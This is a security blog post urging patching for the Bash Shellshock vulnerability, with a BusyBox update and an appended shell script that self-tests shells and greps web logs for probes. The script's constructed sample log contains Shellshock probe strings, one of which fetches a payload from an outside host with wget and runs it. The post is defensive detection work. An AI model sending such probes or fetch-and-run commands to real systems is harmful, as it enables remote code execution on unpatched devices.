If you haven’t paid attention to the Bash Shellshock vulnerability – NOW IS THE TIME!
The number of source IPs probing for the vulnerability, and the scope of their scans, are growing slowly (as of 9/30/14, 10am Eastern).
There are many vulnerable devices and systems exposed to exploitation, and a variety of exploitation vectors exist. Any service that copies attacker-controlled data into an environment variable and then invokes bash is a candidate: web CGIs, DHCP clients, OpenVPN, SSH, etc. It is highly likely that a wide variety of embedded systems that expose these same services are vulnerable as well. So far, we have seen attack traffic in the HITME coming from a few SOHO routers and a couple of other embedded network devices. Items like printers, some routers and managed switches, home gadgets, cameras, etc. are likely targets as well.
In the industrial control world, there are a variety of embedded devices leveraging Linux at the core, many of them with exposed CGI mechanisms for remote management and monitoring. These need to be inspected as well, since they may prove vulnerable and exploitable via one or more of these vectors. Patching may require firmware upgrades in some cases; contact the vendor for more information.
But, no matter what systems you use and manage, NOW IS THE TIME. Pay attention to this issue and get moving on patching, adding compensating controls and rolling out enhanced detection mechanisms. GET BUSY!
As always, if we can assist, feel free to give us a call or drop us a line. We have HoneyPoint emulations for HPSS clients that can help identify sources of traffic, and we have up-to-the-moment assessment signatures for the known attack vectors. Let us know if we can help!
Thanks for reading, and stay safe out there!
UPDATE: Good news on Shellshock for embedded devices: if it runs BusyBox, it is likely NOT vulnerable. BusyBox's ash is a separate shell implementation that does not import function definitions from environment variables, which is the mechanism Shellshock abuses. One caveat: a BusyBox-based device can still ship a real bash binary alongside it (or use bash as a CGI or script interpreter), so check for a bash binary and its version rather than relying on the presence of BusyBox alone.
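As an added example (not code from the original post or from MicroSolved) tying together the exploitation vectors and detection points above with the BusyBox update: the first function runs the widely published environment-function self-test against any shell binary you name, so on an embedded device you can point it at /bin/sh (BusyBox ash) and at any bash binary found alongside it; the other two grep web-server logs for the literal "() {" prefix that bash requires before it will import a function from the environment. The sample log lines are constructed (documentation-range IPs, not HITME traffic), and the script assumes only a POSIX sh and grep.

```shell
#!/bin/sh
# Added example, not code from the original post or from MicroSolved.
# Assumes a POSIX sh and grep; the self-test additionally assumes the shell
# under test is on PATH or given as a full path.

# Self-test: does the given shell import a function definition from an
# environment variable and then run the command that follows it? That is the
# Shellshock (CVE-2014-6271) behaviour. Prints one of:
#   vulnerable     - the trailing command ran during environment import
#   not-vulnerable - the shell ignored the function-definition value
#   not-found      - no such shell binary
shellshock_selftest() {
    shell_bin="${1:-bash}"
    if ! command -v "$shell_bin" >/dev/null 2>&1; then
        echo "not-found"
        return 0
    fi
    # The marker is printed only if the "; echo ..." after the function body
    # is executed while the shell imports its environment. stderr is
    # discarded because patched bash versions log a warning instead.
    out=$(env probe='() { :;}; echo SHELLSHOCK_MARKER' "$shell_bin" -c 'true' 2>/dev/null)
    case "$out" in
        *SHELLSHOCK_MARKER*) echo "vulnerable" ;;
        *) echo "not-vulnerable" ;;
    esac
}

# Detection: print web-server log lines carrying a Shellshock probe. bash only
# imports an environment value as a function when it begins with the exact
# four bytes "() {", so every working probe must contain that literal in a
# field the server turns into an environment variable (User-Agent, Referer,
# Cookie, query string, ...). A fixed-string grep on it is cheap and
# high-precision; URL-encoded copies in the request path would need decoding
# first. Reads stdin, e.g.:  shellshock_log_hits < /var/log/apache2/access.log
shellshock_log_hits() {
    grep -F '() {'
}

# Same check, but print only the number of matching lines.
shellshock_log_hit_count() {
    grep -cF '() {'
}

# Constructed sample access-log lines (documentation-range IPs, not real
# HITME traffic). Lines 1 and 3 carry probes in User-Agent and Referer.
SAMPLE_LOG='203.0.113.10 - - [30/Sep/2014:10:02:11 -0400] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c \"wget http://198.51.100.7/x -O /tmp/x; sh /tmp/x\""
198.51.100.22 - - [30/Sep/2014:10:02:13 -0400] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
203.0.113.10 - - [30/Sep/2014:10:02:15 -0400] "GET /cgi-bin/test.cgi HTTP/1.1" 404 210 "() { :;}; /bin/ping -c 1 198.51.100.7" "curl/7.30.0"'

# Stand-alone demo: test the shells on this host, then scan the sample log.
printf 'bash self-test: %s\n' "$(shellshock_selftest bash)"
printf '/bin/sh self-test: %s\n' "$(shellshock_selftest /bin/sh)"
printf 'sample log lines flagged: %s\n' "$(printf '%s\n' "$SAMPLE_LOG" | shellshock_log_hit_count)"
printf '%s\n' "$SAMPLE_LOG" | shellshock_log_hits
```

On a device, run the self-test against every shell binary you can find (find / -name 'bash*' -type f), not just /bin/sh, since a BusyBox-linked /bin/sh says nothing about a bash that a CGI script or vendor daemon may invoke directly.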